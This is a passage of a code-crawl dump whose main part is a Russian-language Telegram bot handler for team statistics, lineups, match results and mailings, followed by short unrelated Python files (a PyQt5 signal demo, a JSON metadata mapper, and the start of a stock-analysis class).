bot.send_message(chat_id=message.chat.id, text=text, reply_markup=current_season_keyboard.get_keyboard())\n bot.register_next_step_handler(message, my_stat_by_season_pt1)\n\ndef my_stat_season_2022(message):\n tg_id=message.chat.id\n player_info=[]\n player_info.append(tg_id)\n\n button_list=['Назад']\n season_2022_keyboard=Keyboard(button_list)\n text=db_player_season_2022_stat(db_session,player_info)\n bot.send_message(chat_id=message.chat.id, text=text, reply_markup=season_2022_keyboard.get_keyboard())\n bot.register_next_step_handler(message, my_stat_by_season_pt1)\n\ndef my_stat_all_time(message):\n tg_id=message.chat.id\n player_info=[]\n player_info.append(tg_id)\n\n text = db_player_all_time_stat(db_session,player_info)\n bot.send_message(chat_id=message.chat.id, text=text)\n STAT(message)\n\n\"\"\"\n-----------------------------------------------КОМАНДА---------------------------------------\n\"\"\"\ndef TEAM(message):\n buttons_list = ['Турнирные таблицы', 'Список игроков','Статистика команды', 'Статистика игроков', 'Назад']\n team_keyboard = Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text='Выберите раздел', reply_markup=team_keyboard.get_keyboard())\n bot.register_next_step_handler(message, team_menu)\n\ndef team_menu(message = None):\n if message.text=='Турнирные таблицы':\n tournament_table(message)\n if message.text=='Список игроков':\n players_list(message)\n if message.text=='Статистика команды':\n team_stat(message)\n if message.text=='Статистика игроков':\n players_stat(message)\n if message.text=='Назад':\n if message.chat.id in PLAYERS_ID_LIST:\n MAIN(message)\n else:\n MAIN_ADMIN(message)\n\"\"\"\nТУРНИРНЫЕ ТАБЛИЦЫ\n\"\"\"\ndef tournament_table(message):\n bot.send_message(chat_id=message.chat.id, text='http://oflm.ru/league/vtoraya23/')\n TEAM(message)\n\"\"\"\nСПИСОК ИГРОКОВ\n\"\"\"\ndef players_list(message):\n text=db_players_list(db_session)\n bot.send_message(chat_id=message.chat.id, text=text)\n TEAM(message)\n\"\"\"\nСТАТИСТИКА КОМАНДЫ\n\"\"\"\ndef team_stat(message):\n buttons_list = ['Статистика команды по сезонам', 'Статистика команды за всё время','Назад']\n team_stat_keyboard = Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text='Выберите период', reply_markup=team_stat_keyboard.get_keyboard())\n bot.register_next_step_handler(message, team_stat_menu)\n\ndef team_stat_menu(message):\n if message.text=='Статистика команды по сезонам':\n team_stat_by_season(message)\n if message.text=='Статистика команды за всё время':\n text=db_team_all_time_stat(db_session)\n bot.send_message(chat_id=message.chat.id, text=text)\n team_stat(message)\n if message.text=='Назад':\n TEAM(message)\n\ndef team_stat_by_season(message):\n buttons_list = ['Статистика команды за сезон 2022', 'Статистика команды за текущий сезон', 'Назад']\n team_stat_by_season_keyboard = Keyboard(buttons_list)\n\n bot.send_message(chat_id=message.chat.id, text='Выберите сезон' , reply_markup=team_stat_by_season_keyboard.get_keyboard())\n bot.register_next_step_handler(message,team_stat_by_season_menu)\n\ndef team_stat_by_season_menu(message):\n if message.text=='Статистика команды за текущий сезон':\n team_stat_current_season(message)\n if message.text=='Статистика команды за сезон 2022':\n team_stat_season_2022(message)\n if message.text=='Назад':\n team_stat(message)\n\ndef team_stat_current_season(message):\n text=db_team_season_2023_stat(db_session)\n bot.send_message(chat_id=message.chat.id, text=text)\n team_stat_by_season(message)\n\ndef team_stat_season_2022(message):\n text=db_team_season_2022_stat(db_session)\n bot.send_message(chat_id=message.chat.id, text=text)\n team_stat_by_season(message)\n\"\"\"\nСТАТИСТИКА ИГРОКОВ\n\"\"\"\n\ndef players_stat(message):\n list=get_names_and_numbers(db_session)\n markup = types.InlineKeyboardMarkup()\n buttons_list=[]\n for i in range(0,len(list)):\n name=list[i][1]\n number=list[i][0]\n btn=types.InlineKeyboardButton(text=f\"{name}\", callback_data=f\"{number}\")\n buttons_list.append(btn)\n markup = types.InlineKeyboardMarkup()\n markup.add(*buttons_list)\n buttons_list=['Назад']\n keyboard=Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text='Выберите игрока', reply_markup=markup)\n bot.send_message(chat_id=message.chat.id, text=\"Для выхода из раздела воспользуйтесь кнопкой 'Назад' стандартного меню\",reply_markup=keyboard.get_keyboard())\n bot.register_next_step_handler(message, players_stat_menu)\n\ndef players_stat_menu(message):\n if message.text==\"Назад\":\n TEAM_MANAGEMENT(message)\n\n@bot.callback_query_handler(func=lambda call: True)\ndef callback_inline(call):\n if call.data==\"да\":\n confirm_lineup(call)\n print(\"Прошло\")\n if call.data==\"нет\":\n print(\"Не прошло\")\n TEAM_MANAGEMENT(call.message)\n open(\"lineup.txt\", \"w\")\n list=get_names_and_numbers(db_session)\n name_list=[]\n for i in range(0,len(list)):\n name=list[i][1]\n number=list[i][0]\n name_list.append(name)\n player_info=[]\n if call.data == f\"{number}\":\n player_info.append(name)\n tg_id=get_player_tg(db_session,player_info)\n player_info[0]=tg_id\n output= db_player_all_time_stat(db_session, player_info)\n bot.send_message(chat_id=call.message.chat.id, text=f\"За всё время:\\n\"+output)\n output= db_player_season_2022_stat(db_session, player_info)\n bot.send_message(chat_id=call.message.chat.id, text=f\"За сезон 2022:\\n\"+output)\n output= db_player_season_2023_stat(db_session, player_info)\n bot.send_message(chat_id=call.message.chat.id, text=f\"За сезон 2023:\\n\"+output)\n for name in name_list:\n if call.data==f\"{name}\": \n create_lineup(call,name)\n if call.data==\"Готово\":\n check_lineup(call)\n\ndef create_lineup(call,name):\n path = \"lineup.txt\"\n if os.path.isfile(path) ==True:\n file = open(\"lineup.txt\", \"r\")\n lines = [line.rstrip() for line in file]\n file.close\n print(\"прочитано\")\n if not lines:\n file=open(\"lineup.txt\", \"a+\")\n file.write(f\"{name}\")\n file.write(\"\\n\")\n file.close\n bot.send_message(chat_id=call.message.chat.id, text=f\"Игрок {name} добавлен в состав\")\n print(\"добавлен\")\n else:\n if name in lines:\n bot.send_message(chat_id=call.message.chat.id, text=f\"Игрок {name} уже есть в составе\")\n file.close\n print(\"уже есть\")\n else:\n file=open(\"lineup.txt\", \"a+\")\n file.write(f\"{name}\")\n file.write(\"\\n\")\n file.close\n bot.send_message(chat_id=call.message.chat.id, text=f\"Игрок {name} добавлен в состав\")\n else:\n log(LOG_COMMAND.format(reg = 'handler',\n file = 'handler',\n lvl= 'ERROR',\n msg = f\"Cannot write to file {path}\"))\n bot.send_message(chat_id=call.message.chat.id, text=\"В данный момент работа модуля невозможна\")\n\ndef check_lineup(call):\n path = \"lineup.txt\"\n if os.path.isfile(path) ==False:\n bot.send_message(chat_id=call.message.chat.id, text=\"Состав не укомплектован\")\n #дописать ветку\n if os.path.isfile(path) ==True:\n file = open(\"lineup.txt\", \"r\")\n lines = [line.rstrip() for line in file]\n file.close\n output=\"\"\n if len(lines)>=6:\n for i in range(0,len(lines)):\n output+=f\"{lines[i]}\\n\"\n markup = types.InlineKeyboardMarkup()\n btn=types.InlineKeyboardButton(text=\"Подтвердить\", callback_data=\"да\")\n markup.add(btn)\n btn=types.InlineKeyboardButton(text=\"Отменить\", callback_data=\"нет\")\n markup.add(btn)\n bot.send_message(chat_id=call.message.chat.id, text=f\"Подтвердите состав:\\n{output}\", reply_markup=markup)\n else:\n log(LOG_COMMAND.format(reg='handler',\n file='handler',\n lvl='ERROR',\n msg=f\"Cannot write to file {path}\"))\n bot.send_message(chat_id=call.message.chat.id, text=\"Состав не укомплектован\")\n\ndef confirm_lineup(call):\n \"\"\"file = open(\"lineup.txt\", \"r\")\n lines = [line.rstrip() for line in file]\n file.close\n player_info=[]\n for i in range(0, len(lines)):\n player_info.append(f\"{lines[i]}\")\n db_insert_games(db_session, player_info)\"\"\"\n bot.send_message(chat_id=call.message.chat.id, text=\"Состав сформирован\")\n game_result(call.message)\n\"\"\"\n------------------------------------------УПРАВЛЕНИЕ КОМАНДОЙ---------------------------------\n\"\"\"\ndef TEAM_MANAGEMENT(message):\n buttons_list = ['День игры','Состав на матч', 'Результат матча','Подготовить рассылку','Изменить состав команды','Редактировать профиль игрока','Назад']\n team_management_keyboard = Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text='Меню управления командой',reply_markup=team_management_keyboard.get_keyboard())\n bot.register_next_step_handler(message, team_management_menu)\n\ndef team_management_menu(message):\n if message.text=='Состав на матч':\n team_list(message)\n if message.text=='Результат матча':\n game_result(message)\n if message.text=='Подготовить рассылку':\n mailing(message)\n if message.text=='Изменить состав команды':\n change_squad_list(message)\n if message.text=='Редактировать профиль игрока':\n edit_profile(message)\n if message.text=='Назад':\n MAIN_ADMIN(message)\n\"\"\"\nСостав на матч\n\"\"\"\ndef team_list(message):\n bot.send_photo(chat_id=message.chat.id,photo=InputFile(FIELD_PHOTO))\n list=get_names_and_numbers(db_session)\n markup = types.InlineKeyboardMarkup()\n buttons_list=[]\n for i in range(0,len(list)):\n name=list[i][1]\n btn=types.InlineKeyboardButton(text=f\"{name}\", callback_data=f\"{name}\")\n buttons_list.append(btn)\n btn=types.InlineKeyboardButton(text=\"Готово\", callback_data=\"Готово\")\n buttons_list.append(btn)\n markup = types.InlineKeyboardMarkup()\n markup.add(*buttons_list)\n buttons_list=['Назад']\n keyboard=Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text='Соберите состав', reply_markup=markup)\n bot.send_message(chat_id=message.chat.id, text=\"Для выхода из раздела воспользуйтесь кнопкой 'Назад' стандартного меню\",reply_markup=keyboard.get_keyboard())\n bot.register_next_step_handler(message, team_list_menu)\n\ndef team_list_menu(message):\n if message.text==\"Назад\":\n TEAM_MANAGEMENT(message)\n\n\"\"\"\nРЕДАКТИРОВАТЬ ПРОФИЛЬ ИГРОКА\n\"\"\"\ndef edit_profile(message):\n buttons_list = ['Назад']\n keyboard = Keyboard(buttons_list)\n\n bot.send_message(chat_id=message.chat.id, text='Введите номер игрока', reply_markup=keyboard.get_keyboard())\n bot.register_next_step_handler(message,type_number)\n\ndef type_number(message):\n if message.text==\"Назад\":\n TEAM_MANAGEMENT(message)\n else:\n number=message.text\n player_info=[]\n player_info.append(number)\n if IntValidator.validateValue(number) == True:\n if check_number(db_session,player_info)!=False:\n if check_vk_id(db_session,player_info)==False:\n name=get_name_by_number(db_session, player_info)\n bot.send_message(chat_id=message.chat.id, text=f'Введите ссылку на профиль игрока {name} в соц.сети Вконтакте')\n bot.register_next_step_handler(message, type_vk_id,player_info)\n else:\n buttons_list = ['Да', 'Нет']\n keyboard = Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text=f'Ссылка на профиль уже сохранена. Хотите изменить?',reply_markup=keyboard.get_keyboard())\n bot.register_next_step_handler(message, change_link, player_info)\n else:\n bot.send_message(chat_id=message.chat.id, text='Игрока с таким номером не существует')\n else:\n output=BotValueError.process()\n return(output)\n\ndef change_link(message, player_info):\n if message.text=='Да':\n bot.send_message(chat_id=message.chat.id, text='Вставьте новую ссылку на профиль')\n bot.register_next_step_handler(message, type_vk_id, player_info)\n if message.text=='Нет':\n TEAM_MANAGEMENT(message)\n\ndef confirm_edit(message,player_info):\n if message.text =='Подтвердить':\n db_insert_vk_id(db_session,player_info)\n bot.send_message(chat_id=message.chat.id, text=\"Профиль отредактирован\")\n TEAM_MANAGEMENT(message)\n if message.text =='Отменить':\n TEAM_MANAGEMENT(message)\n\ndef type_vk_id(message, player_info):\n vk_id=message.text\n player_info.append(vk_id)\n\n buttons_list = ['Подтвердить', 'Отменить']\n keyboard = Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text='Подтвердить изменение',reply_markup=keyboard.get_keyboard())\n bot.register_next_step_handler(message, confirm_edit, player_info)\n\"\"\"\nИЗМЕНИТЬ СОСТАВ КОМАНДЫ\n\"\"\"\ndef change_squad_list(message):\n buttons_list = ['Добавить игрока', 'Удалить игрока', 'Назад']\n change_squad_list_keyboard = Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text='Выберите нужное',reply_markup=change_squad_list_keyboard.get_keyboard())\n bot.register_next_step_handler(message, change_squad_list_menu)\n\ndef change_squad_list_menu(message):\n if message.text=='Добавить игрока':\n add_player(message)\n if message.text=='Удалить игрока':\n delete_player_pt1(message)\n if message.text=='Назад':\n TEAM_MANAGEMENT(message)\n\"\"\"\nДОБАВИТЬ ИГРОКА\n\"\"\"\ndef add_player(message):\n button_list=['Назад']\n add_player_keyboard=Keyboard(button_list)\n player_info=[]\n bot.send_message(chat_id=message.chat.id,text='Введите информацию об игроке:\\nФамилия Имя\\nИгровой номер\\ntelegram_id\\nvk_id',reply_markup=add_player_keyboard.get_keyboard())\n bot.register_next_step_handler(message, type_info,player_info)\n\ndef type_info(message,player_info):\n if message.text=='Назад':\n change_squad_list(message)\n else:\n info=message.text\n x=info.split(\"\\n\")\n y=0\n for i in x:\n if i:\n y+= 1\n if y<3:\n bot.send_message(chat_id=message.chat.id,text=\"Не хватает данных\")\n if y==3:\n name=info.split(\"\\n\")[0]\n number=info.split(\"\\n\")[1]\n tg_id=info.split(\"\\n\")[2]\n vk_id=\"отсутствует\"\n if IntValidator.validateValue(number)==True:\n player_info.append(number)\n if check_number(db_session, player_info)==False:\n if TextValidator.validateValue(name)==True:\n if TextValidator.validatePlayerName(name)==True:\n player_info.append(name)\n if check_name(db_session, player_info)==False:\n if IntValidator.validateValue(tg_id)==True:\n player_info.append(tg_id)\n if check_tg_id(db_session,player_info)==False:\n player_info.append(vk_id)\n db_insert_player(db_session,player_info)\n bot.send_message(chat_id=message.chat.id,text=\"Данные об игроке внесены\\nНе забудьте добавить ссылку на страницу игрока в сети Вконтакте\")\n else:\n bot.send_message(chat_id=message.chat.id,text='Игрок с таким telegram_id уже есть в таблице')\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n else:\n bot.send_message(chat_id=message.chat.id,text='Игрок с таким именем уже есть в таблице')\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n else:\n bot.send_message(chat_id=message.chat.id,text='Данный номер занят')\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n if y==4:\n name=info.split(\"\\n\")[0]\n number=info.split(\"\\n\")[1]\n tg_id=info.split(\"\\n\")[2]\n vk_id=info.split(\"\\n\")[3]\n if IntValidator.validateValue(number)==True:\n player_info.append(number)\n if check_number(db_session, player_info)==False:\n if TextValidator.validateValue(name)==True:\n if TextValidator.validatePlayerName(name)==True:\n player_info.append(name)\n if check_name(db_session, player_info)==False:\n if IntValidator.validateValue(tg_id)==True:\n player_info.append(tg_id)\n if check_tg_id(db_session,player_info)==False:\n player_info.append(vk_id)\n db_insert_player(db_session,player_info)\n bot.send_message(chat_id=message.chat.id,text=\"Данные об игроке внесены\")\n else:\n bot.send_message(chat_id=message.chat.id,text='Игрок с таким telegram_id уже есть в таблице')\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n else:\n bot.send_message(chat_id=message.chat.id,text='Игрок с таким именем уже есть в таблице')\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n else:\n bot.send_message(chat_id=message.chat.id,text='Данный номер занят')\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n if y>4:\n bot.send_message(chat_id=message.chat.id,text=\"Ошибки всегда поджидают, чтобы их допускали.\")\n\"\"\"\nУДАЛИТЬ ИГРОКА\n\"\"\"\ndef delete_player_pt1(message):\n button_list=['Назад']\n delete_player_keyboard=Keyboard(button_list)\n bot.send_message(chat_id=message.chat.id, text='Введите номер игрока', reply_markup=delete_player_keyboard.get_keyboard())\n bot.register_next_step_handler(message, delete_player_pt2)\n\ndef delete_player_pt2(message):\n if message.text=='Назад':\n change_squad_list(message)\n else:\n number=message.text\n if IntValidator.validateValue(number) == True:\n number=int(number)\n player_info=[]\n player_info.append(number)\n if check_number(db_session,player_info)==False:\n bot.send_message(chat_id=message.chat.id, text='Игрока с таким номером не существует')\n delete_player_pt1(message)\n\n else:\n name=get_name_by_number(db_session,player_info)\n markup = ReplyKeyboardMarkup\n button_list = ['Подтвердить', 'Отменить']\n markup=Keyboard(button_list)\n bot.send_message(chat_id=message.chat.id, text=f'Подтвердите удаление игрока\\t{name}',reply_markup=markup.get_keyboard())\n bot.register_next_step_handler(message, delete_player_confirm, player_info)\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n\ndef delete_player_confirm(message,player_info):\n if message.text == \"Подтвердить\":\n db_delete_player(db_session,player_info)\n bot.send_message(message.chat.id, text=f\"Игрок удалён\")\n delete_player_pt1(message)\n if message.text == \"Отменить\":\n bot.send_message(message.chat.id, text=\"Удаление отменено\")\n delete_player_pt1(message)\n\n\"\"\"\nРЕЗУЛЬТАТ МАТЧА\n\"\"\"\ndef game_result(message):\n button_list=['Назад']\n game_result_keyboard=Keyboard(button_list)\n game_info=[]\n bot.send_message(chat_id=message.chat.id, text='Счёт игры (забито : пропущено):', reply_markup=game_result_keyboard.get_keyboard())\n bot.register_next_step_handler(message, team_stat_pt1 ,game_info)\n\ndef team_stat_pt1(message,game_info):\n if message.text=='Назад':\n game_result(message)\n else:\n string=message.text\n if string.count(\":\")!=1:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n game_result(message)\n else:\n if IntValidator.validateValue(string.split(\":\")[0]) == True:\n scored=string.split(\":\")[0]\n if IntValidator.validateValue(string.split(\":\")[1]) == True:\n conceded=string.split(\":\")[1]\n wins=0\n loses=0\n draws=0\n if scored!=conceded:\n if scored>conceded:\n wins=1\n loses=0\n draws=0\n result=\"победа\"\n\n if scored<conceded:\n wins=0\n loses=1\n draws=0\n result=\"поражение\"\n else:\n wins=0\n loses=0\n draws=1\n result=\"ничья\"\n game_info.append(result)\n game_info.append(wins)\n game_info.append(loses)\n game_info.append(draws)\n game_info.append(scored)\n game_info.append(conceded)\n\n bot.send_message(chat_id=message.chat.id, text='Карточки(жёлтые:красные):')\n bot.register_next_step_handler(message, team_stat_pt2 ,game_info)\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n\ndef team_stat_pt2(message,game_info):\n string=message.text\n if not string.find(\":\"):\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n else:\n\n yellow=string.split(\":\")[0]\n red=string.split(\":\")[1]\n if IntValidator.validateValue(yellow) == True:\n if IntValidator.validateValue(red) == True:\n game_info.append(yellow)\n game_info.append(red)\n\n bot.send_message(chat_id=message.chat.id, text='Введите персональные результаты:\\n(Игрок:гол:передача:жёлтые:красные)')\n bot.register_next_step_handler(message, team_stat_pt3 ,game_info)\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n\ndef team_stat_pt3(message,game_info):\n info=message.text\n x=info.split(\"\\n\")\n y=0\n for i in x:\n if i:\n y+= 1\n personal_info=[]\n for i in range(y):\n name=x[i].split(\":\")[0]\n goals=x[i].split(\":\")[1]\n assists=x[i].split(\":\")[2]\n yc=x[i].split(\":\")[3]\n rc=x[i].split(\":\")[4]\n if TextValidator.validateValue(name)==True:\n if TextValidator.validatePlayerName(name)==True:\n if IntValidator.validateValue(goals)==True:\n if IntValidator.validateValue(assists)==True:\n if IntValidator.validateValue(yc)==True:\n if IntValidator.validateValue(rc)==True:\n personal_info.append(x[i])\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n else:\n output=BotValueError.process()\n bot.send_message(chat_id=message.chat.id, text=output)\n game_info.append(personal_info)\n team_stat_pt4(message,game_info)\n\ndef team_stat_pt4(message, game_info):\n if game_info[0]==\"поражение\":\n text=f\"Поражение\\nЗабито: {game_info[4]}\\nПропущено: {game_info[5]}\\nЖёлтые карточки: {game_info[6]}\\nКрасные карточки: {game_info[7]}\\n\\nЛичная статистика:\\n{game_info[8]}\"\n if game_info[0]==\"победа\":\n text=f\"Победа\\nЗабито: {game_info[4]}\\nПропущено: {game_info[5]}\\nЖёлтые карточки: {game_info[6]}\\nКрасные карточки: {game_info[7]}\\n\\nЛичная статистика:\\n{game_info[8]}\"\n if game_info[0]==\"ничья\":\n text=f\"Ничья\\nЗабито: {game_info[4]}\\nПропущено: {game_info[5]}\\nЖёлтые карточки: {game_info[6]}\\nКрасные карточки: {game_info[7]}\\n\\nЛичная статистика:\\n{game_info[8]}\"\n\n buttons_list = ['Подтвердить', 'Отменить']\n keyboard = Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text=text, reply_markup=keyboard.get_keyboard())\n bot.register_next_step_handler(message, team_stat_pt5 ,game_info)\n\ndef team_stat_pt5(message,game_info):\n if message.text ==\"Подтвердить\":\n insert_game_result_team(db_session, game_info)\n insert_game_result_player(db_session,game_info)\n #confirm_file = open(\"c:/applications/new.txt\", \"w\")\n with open(\"c:/applications/change_stat.txt\", \"w\", encoding='utf-8') as file:\n for i in range(0,9):\n file.write(f'{game_info[i]}\\n')\n file.write('Ожидает подтверждения')\n bot.send_message(chat_id=message.chat.id, text=\"Статистика ожидает подтверждения\")\n for row in ADMINS_ID_LIST:\n bot.send_message(chat_id=row, text=\"Информация ожидает подтверждения\")\n TEAM_MANAGEMENT(message)\n if message.text ==\"Отменить\":\n TEAM_MANAGEMENT(message)\n\"\"\"\nРАССЫЛКА\n\"\"\"\ndef mailing(message):\n buttons_list = ['Игра','Тренировка', 'Объявление', 'Назад']\n add_new_player_keyboard = Keyboard(buttons_list)\n\n bot.send_message(chat_id=message.chat.id, text='Выберите мероприятие',reply_markup=add_new_player_keyboard.get_keyboard())\n bot.register_next_step_handler(message, mailing_menu)\n\ndef mailing_menu(message):\n if message.text=='Игра':\n prepair_game_mailing(message)\n if message.text=='Тренировка':\n prepair_training_mailing(message)\n if message.text=='Объявление':\n prepair_advertisment(message)\n if message.text=='Назад':\n TEAM_MANAGEMENT(message)\n\ndef prepair_game_mailing(message):\n button_list=['Назад']\n prepair_game_mailing_keyboard=Keyboard(button_list)\n bot.send_message(chat_id=message.chat.id, text='Введите день', reply_markup=prepair_game_mailing_keyboard.get_keyboard())\n info=[]\n bot.register_next_step_handler(message,type_game_day, info)\n\ndef type_game_day(message,info):\n if message.text=='Назад':\n mailing(message)\n else:\n date=message.text\n info.append(date)\n\n bot.send_message(chat_id=message.chat.id,text='Введите время в формате HH:MM')\n bot.register_next_step_handler(message, type_game_time, info)\n\ndef type_game_time(message, info):\n time=message.text\n info.append(time)\n\n bot.send_message(chat_id=message.chat.id,text='Вставьте адрес')\n bot.register_next_step_handler(message, type_game_address, info)\n\ndef type_game_address(message, info):\n address=message.text\n info.append(address)\n\n bot.send_message(chat_id=message.chat.id, text='Вставьте ссылку на опрос')\n bot.register_next_step_handler(message, type_game_link, info)\n\ndef type_game_link(message,info):\n\n link = message.text\n info.append(link)\n bot.send_message(chat_id=message.chat.id,text=\"Проверьте данные:\")\n check_game_mailing(message, info)\n\ndef check_game_mailing(message, info):\n buttons_list = ['Подтвердить', 'Отменить']\n keyboard = Keyboard(buttons_list)\n\n str_game=f'Время игры:{info[0]} {info[1]}\\nАдрес:{info[2]}\\nОпрос:{info[3]}'\n info[0]=str_game\n bot.send_message(chat_id=message.chat.id,text=str_game,reply_markup=keyboard.get_keyboard())\n bot.register_next_step_handler(message, confirm_game_mailing ,info)\n\ndef confirm_game_mailing(message,info):\n if message.text ==\"Подтвердить\":\n send_mailing(info)\n mailing(message)\n if message.text ==\"Отменить\":\n mailing(message)\n\ndef prepair_training_mailing(message):\n button_list=['Назад']\n prepair_training_mailing_keyboard=Keyboard(button_list)\n bot.send_message(chat_id=message.chat.id, text='Введите день', reply_markup=prepair_training_mailing_keyboard.get_keyboard())\n\n info=[]\n bot.register_next_step_handler(message,type_training_day, info)\n\ndef type_training_day(message, info):\n if message.text=='Назад':\n mailing(message)\n else:\n date=message.text\n info.append(date)\n\n bot.send_message(chat_id=message.chat.id,text='Введите время в формате HH:MM')\n bot.register_next_step_handler(message, type_training_time, info)\n\ndef type_training_time(message, info):\n time=message.text\n info.append(time)\n\n bot.send_message(chat_id=message.chat.id,text='Вставьте адрес')\n bot.register_next_step_handler(message, type_training_address, info)\n\ndef type_training_address(message, info):\n address=message.text\n info.append(address)\n\n bot.send_message(chat_id=message.chat.id, text='Вставьте ссылку на опрос')\n bot.register_next_step_handler(message, type_training_link, info)\n\ndef type_training_link(message,info):\n\n link = message.text\n info.append(link)\n bot.send_message(chat_id=message.chat.id,text=\"Проверьте данные:\")\n check_train_mailing(message,info)\n\ndef check_train_mailing(message, info):\n buttons_list = ['Подтвердить', 'Отменить']\n keyboard = Keyboard(buttons_list)\n\n str_training=f'Время тренировки:{info[0]} {info[1]}\\nАдрес:{info[2]}\\nОпрос:{info[3]}'\n info[0]=str_training\n bot.send_message(chat_id=message.chat.id,text=str_training,reply_markup=keyboard.get_keyboard())\n\n bot.register_next_step_handler(message, confirm_training_mailing ,info)\n\ndef confirm_training_mailing(message,info):\n if message.text ==\"Подтвердить\":\n send_mailing(info)\n mailing(message)\n if message.text ==\"Отменить\":\n mailing(message)\n\ndef prepair_advertisment(message):\n button_list=['Назад']\n prepair_advertisment_keyboard=Keyboard(button_list)\n bot.send_message(chat_id=message.chat.id, text='Введите текст', reply_markup=prepair_advertisment_keyboard.get_keyboard())\n bot.register_next_step_handler(message,type_advertisement)\n\ndef type_advertisement(message):\n if message.text=='Назад':\n mailing(message)\n else:\n text=message.text\n info=[]\n info.append(text)\n bot.send_message(chat_id=message.chat.id,text=\"Проверьте данные:\")\n check_advertisment(message,info)\n\ndef check_advertisment(message, info):\n buttons_list = ['Подтвердить', 'Отменить']\n keyboard = Keyboard(buttons_list)\n\n bot.send_message(chat_id=message.chat.id,text=f'{info[0]}',reply_markup=keyboard.get_keyboard())\n bot.register_next_step_handler(message, confirm_advertisment_mailing ,info)\n\ndef confirm_advertisment_mailing(message, info):\n if message.text ==\"Подтвердить\":\n send_mailing(info)\n mailing(message)\n if message.text ==\"Отменить\":\n mailing(message)\n\ndef send_mailing(info):\n text=info[0]\n for user in ADMINS_ID_LIST:\n bot.send_message(text = text, chat_id = user)","repo_name":"fanatsnaiper/WolverBot","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":41704,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"3490942438","text":"# _*_ coding: utf-8 _*_\n# @Time : 2022/6/11 17:40\n# @Author : Michael\n# @File : signal2.py\n# @desc :\nimport sys\n\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtWidgets import QWidget, QPushButton, QApplication\n\n\nclass win(QWidget):\n button_clicked_signal = pyqtSignal()\n def __init__(self):\n super().__init__()\n self.setWindowTitle('内置信号与槽')\n self.resize(200, 300)\n btn = QPushButton('X', self)\n btn.clicked.connect(self.btn_click)\n self.button_clicked_signal.connect(self.close)\n def btn_click(self):\n self.button_clicked_signal.emit()\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n w = win()\n w.show()\n sys.exit(app.exec_())","repo_name":"kobe24o/Python_learning","sub_path":"qt/ch7/signal2.py","file_name":"signal2.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"72411246137","text":"from typing import Optional, Dict\n\nfrom common.domain.dto.AttributeMetadata import AttributeMetadata\nfrom common.domain.enum.MetadataType import MetadataType\nfrom common.domain.enum.MetadataUnit import MetadataUnit\nfrom common.domain.json.object_mapper.ObjectMapper import ObjectMapper\nfrom common.exception.JsonDecodeError import JsonDecodeError\n\n\nclass AttributeMetadataMapper(ObjectMapper):\n objectType = AttributeMetadata\n\n def _getMetadataType(self, jsonDict: Dict) -> MetadataType:\n try:\n metadataTypeStr = jsonDict[\"metadataType\"]\n metadataType = MetadataType.__getitem__(metadataTypeStr)\n if metadataTypeStr is None:\n raise JsonDecodeError(\"Required Key 'metadataType' was null.\")\n except KeyError as e:\n raise JsonDecodeError(\"Required Key 'metadataType' was absent, invalid.\", e)\n return metadataType\n\n def _getUnit(self, jsonDict) -> Optional[MetadataUnit]:\n unitStr = jsonDict.get(\"unit\")\n if unitStr is None:\n return None\n try:\n return MetadataUnit.__getitem__(unitStr)\n except KeyError as e:\n raise JsonDecodeError(f\"Unable to convert {unitStr} to a MetadataUnit\")\n\n def map(self, jsonDict: Dict) -> objectType:\n metadataType = self._getMetadataType(jsonDict)\n value = jsonDict.get(\"value\")\n unit = self._getUnit(jsonDict)\n return AttributeMetadata(metadataType=metadataType, value=value, unit=unit)\n","repo_name":"ericghara/CarData","sub_path":"common/domain/json/object_mapper/AttributeMetadataMapper.py","file_name":"AttributeMetadataMapper.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"18606773530","text":"import numpy as np\n\ncriteria = [\"ta_candle_shape\", \"ta_vol\", \"ta_ma5\", \"ta_rs\", \"ta_rs_change\", \"ta_MACD\", \"ta_rsi\", \"ta_stability\", \"ta_boll_width\", \"ta_psar\", \"ta_supertrend\"]\ncriteria_coeff = [1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1]\n\nclass TA_analysis:\n\n def __init__(self, stock_infos, tickers, 